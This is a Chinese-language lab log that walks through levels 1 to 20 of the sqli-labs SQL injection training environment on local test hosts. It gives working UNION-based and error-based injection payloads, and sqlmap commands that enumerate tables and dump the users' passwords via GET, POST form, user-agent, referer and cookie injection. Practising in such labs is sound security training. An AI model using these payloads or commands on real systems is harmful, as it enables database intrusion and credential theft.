sqli-labs 1-20实验记录
1. less1
首先输入?id=1 查找是否有注入点.
输入单引号 回显报错 说明有注入漏洞 而且是数字型
输入 1’ or 1=1 order by 1 猜测列名#
这里发现#不能变成url编码 查一下 应该是%23
http://localhost/sqli-labs-master/Less-1/?id=1%27%20or%201=1%20order%20by%201%20#
在order by 4 的时候报错,说明select语句应该有三列.
然后获取当前数据库:
1’ or 1=1 union select 1,2,database() %23
但是后来知道 这里无论怎样返回的都是第一列的结果,所以把id=1改成id=0再注入
所以可以知道当前数据库的名称是 security
然后获取当前数据库中的表:
0' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database(),3 %27
可以看到 表名有 emails,refers,uagents,users 接下来就是获取users中的字段
0' union select 1,2,group_concat(column_name)from information_schema.columns where table_name ='users' %23
表中的字段有 id,username,password
之后获取我们感兴趣的字段的内容:
第一道题目完成.
2. less2
这道题是数字型注入:
所以和第一道题类似,不需要加单引号就可以。
获取当前数据库0 union select 1,2,database() %23
然后获取表:
0 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database() %23
然后获取字段:
0 union select 1,2,group_concat(column_name)from information_schema.columns where table_name = 'users' %23
然后获取内容:
0 union select 1,2,group_concat(password) from users %23
第二道题完成。
3. less3
看回显报错 代码中 id 应该是 id =(‘$id’)
0') union select 1,2,3 %23实验一下是不是这么构造:
成功 所以接下来像前三关一样获取当前数据库,表,字段,内容就可以了.
第三题完成
4. less4
发现输入单引号 没有报错 输入双引号:
所以和上一个很像,应该用”)拼凑就可以了。
试一下 还是 union select 1,2,3 %23
成功了。
之后还是老方法,获取数据库,表,字段,内容
第四道题目完成.
5. less5
本关用前面的方法都无法注入回显,因为代码中不显示内容。所以需要利用基于错误的语句来注入。
http://localhost/sqli/Less-5/?id=1'and(select 1 from(select count(*),concat(char(32,58,32),(select concat_ws(char(32,58,32),id,username,password)fromuserslimit0,1),char(32,58,32),floor(rand()*2))name from information_schema.tables group by name)b) --+
这里需要不停的刷新 直到显示出来为止。
6. less6
和第五道题类似,但是需要把单引号改成双引号:
http://localhost/sqli/Less-6/?id=1" and (select 1 from(select count(*),concat(char(32,58,32),(select concat_ws(char(32,58,32),id,username,password) from users limit 0,1),char(32,58,32),floor(rand()*2))name from information_schema.tables group by name)b) --+
7. less7
首先构造能够注入的语句, 发现是 id=1’))类型。
这里题目应该是导出文件:
但是上网搜了之后 用输出文件的语句 发现不行 只好用sqlmap了。。。
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-7/?id=1
之后获取当前数据库名称:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-7/?id=1 --current-db
之后获取表:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-7/?id=1 -D security --tables
然后获取users中的字段:
-u http://192.168.48.129/sqli-labs-master/Less-7/?id=1 -D security -T users --columns
最后获取password内容:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-7/?id=1 -D security -T users -C password --dump
第7关完成
8. less8
在这一题,数据库的错误不再回显到页面上,但是我们可以发现当我们构造异常查询时,页面上的you are in会消失,这就是典型的布尔盲注
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-8/?id=1
可以看到 要比上一道题复杂的很多 也耗费时间了:
之后获取当前的dbs
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-8/?id=1 --current-db
然后获取其中的表:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-8/?id=1 -D security --tables
然后获取users中的字段:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-8/?id=1 -D security -T users --columns
然后获取password中的内容:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-8/?id=1 -D security -T users -C password --dump
第八关完成.
9,10关和第八关类似 都有时间注入 所以用sqlmap跑就可以 ,或者自写python脚本.
11. less11
本关开始有post注入了
需要用到sqlmap中的一个 --form 的语句:
可以获取页面 然后构造需要post的数据:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-11/ --forms --dbs
然后获取当前数据库:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-11/ --forms ---current-db
然后获取表名:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-11/ --forms -D security --tables
然后获取users的字段:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-11/ --forms -D security -T users --columns
最后获取password的内容:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-11/ --forms -D security -T users -C password --dump
12,13,14:less12 less13 less14
这关和上关类似 直接sqlmap一路到底就可以。
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-12/ --forms -D security -T users -C password --dump
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-13/ --forms -D security -T users -C password --dump
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-14/ --forms -D security -T users -C password --dump
15:less15
这关 需要设置更高的 level:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-15/ --forms -D security -T users -C password --dump --level3
更加复杂:
16. less16
第十六关 和第十五关类似:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-16/ --forms -D security -T users -C password --dump --level3
17. less17
第17关尝试 用burp抓包,然后获取整个页面的信息后保存在/root/home/1.txt文件中
然后
sqlmap -r "1.txt" -p passwd --tech E --dbms mysql --batch -v 0
18. Less18
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-18/ --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 10 --technique BEST –batch
19. less19
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-19/ --referer=" http://127.0.0.1/sqli-labs-master/Less-19/*" --level 4 --dbs --threads 10 --technique BEST –batch
20.
cookie注入:
sqlmap -u http://192.168.48.129/sqli-labs-master/Less-20/ --cookie="UM_distinctid=16668b878941c2-088ac16771352f-38694646-12c000-16668b878961048" --dbs
sqli-labs 1-20实验记录的更多相关文章
- SQLI LABS Basic Part(1-22) WriteUp
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...
- Sqli labs系列-less-2 详细篇
就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...
- 实验记录:Oracle redo logfile的resize过程
实验记录:Oracle redo logfile的resize过程. 实验环境:RHEL 6.4 + Oracle 11.2.0.3 单实例 文件系统 实验目的:本实验是修改redo logfile的 ...
- case7 淋巴瘤子类分类实验记录
case7 淋巴瘤子类分类实验记录 简介 分类问题:3分类 (identifying three sub-types of lymphoma: Chronic Lymphocytic Leukemia ...
- 使用Scapy向Mininet交换机注入流量 实验记录
使用Scapy向Mininet交换机注入流量 实验记录 用Python脚本及Scapy库写了一个简单的流量生成脚本,并打算使用该脚本往Mininet中的OpenvSwitch交换机注入流量.拓扑图如下 ...
- “取出数据表中第10条到第20条记录”的sql语句+selecttop用法
1.首先,select top用法: 参考问题 select top n * from和select * from的区别 select * from table -- 取所有数据,返回无序集合 sel ...
- “取出数据表中第10条到第20条记录”的sql语句+select top 使用方法
1.首先.select top使用方法: 參考问题 select top n * from和select * from的差别 select * from table -- 取全部数据.返回无序集合 ...
- Sqli labs系列-less-3 。。。
原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...
- Sqli labs系列-less-1 详细篇
要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...
- SUCTF 2019 Upload labs 2 踩坑记录
SUCTF 2019 Upload labs 2 踩坑记录 题目地址 : https://github.com/team-su/SUCTF-2019/tree/master/Web/Upload La ...
随机推荐
- CSS和文档流
1. CSS的定位机制有3种:普通流.浮动和定位. 2. 文档流:从上到下,从左到右,一个挨一个的简单或者叫正常布局. 3. 定位:(position) Static:保持文档流. Relati ...
- MySQL之innochecksum初探
innochecksum是一个用于校验innodb表空间文件完整性的工具,这是一个官方自带的工具,关于它的介绍,可以查看MySQL官方文档,下文主要是通过innodb_ruby来对innochecks ...
- Oracle数据库克隆后temp文件因路径变化无法找到问题
Oracle数据库克隆后temp文件因路径变化无法找到出现如下报错Errors in filexxxx.trc:ORA-01157: cannot identify/lock data file xx ...
- libxml
/** * section: Tree * synopsis: Navigates a tree to print element names * purpose: Parse a file to a ...
- Ubuntu 下安装Mongodb
Mongodb是一款开源的数据库,这里不用我多说了,下面说一下Ubuntu下安装Mongodb可能遇到的问题和解决方案. 故事背景: 今天M$促销,1¥Windows Azure 4000¥-30天的 ...
- ABAP正则表达式 vs SPLIT INTO
需求: 把如下通过"/"连接起来的三个字符串分别解析出来. 传统的做法见下图第98行的function module SKWF_UTIL_IO_FIND_BY_KEY: 这个fun ...
- 关于SessionFactory的不同实现类分别通过getCurrentSession()方法 和 openSession() 方法获取的Session对象在保存对象时的一些区别
一.单向多对一关联关系 一).使用LocalSessionFactoryBean类,即在applicationContext中配置的 <!-- 配置SessionFactory 使用LocalS ...
- 自定义Powershell提示符
实现效果: 实现原理: Powershell将个人配置脚本文件的地址存放在$profile变量中, 通过修改该变量达到想要的目的. 实现过程: 1>创建一个新的配置脚本: 2>编辑脚本内容 ...
- 2018.11.24 struts2中的OGNL表达式及两者的结合
OGNL表达式 OGNL:对象视图导航语言. ${user.addr.name} 这种写法就叫对象视图导航. OGNL不仅仅可以视图导航.支持比EL表达式更加丰富的功能. 理解图示 使用OGNL准备工 ...
- 三种方法解决android帮助文档打开慢
三种方法解决android帮助文档打开慢 经查是因为本地文档中的网页有如下两段js代码会联网加载信息,将其注释掉后就好了 <link rel="stylesheet" h ...